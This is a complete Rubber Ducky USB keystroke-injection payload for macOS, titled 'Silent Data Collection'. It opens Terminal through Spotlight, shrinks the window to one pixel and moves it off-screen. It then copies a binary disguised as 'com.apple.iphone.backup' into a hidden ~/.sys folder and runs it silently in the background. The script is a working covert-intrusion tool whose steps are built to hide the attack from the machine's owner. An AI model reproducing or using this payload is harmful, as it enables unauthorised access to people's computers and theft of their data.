REM ================================================
REM Rubber Ducky Payload: macOS Silent Data Collection
REM Author: un1x01d
REM ================================================

REM === Set Rubber Ducky to HID and STORAGE mode ===
ATTACKMODE HID STORAGE

REM === Set a delay to ensure macOS recognizes the USB drive ===
DELAY 1000

REM === Open Spotlight and launch Terminal ===
COMMAND SPACE
DELAY 500
STRING terminal
ENTER
DELAY 500

REM === Resize the Terminal window to 1x1 and move it off-screen ===
STRING printf '\e[8;1;1t'; printf '\e[3;2560;1440t'
ENTER
DELAY 100

REM === Execute the script silently in the background ===
STRING mkdir -p ~/.sys/ && cp /Volumes/DUCKY/com.apple.iphone.backup ~/.sys/ && cd ~/.sys/ && ./com.apple.iphone.backup &> /dev/null &
ENTER

DELAY 100

REM killall Terminal
ENTER
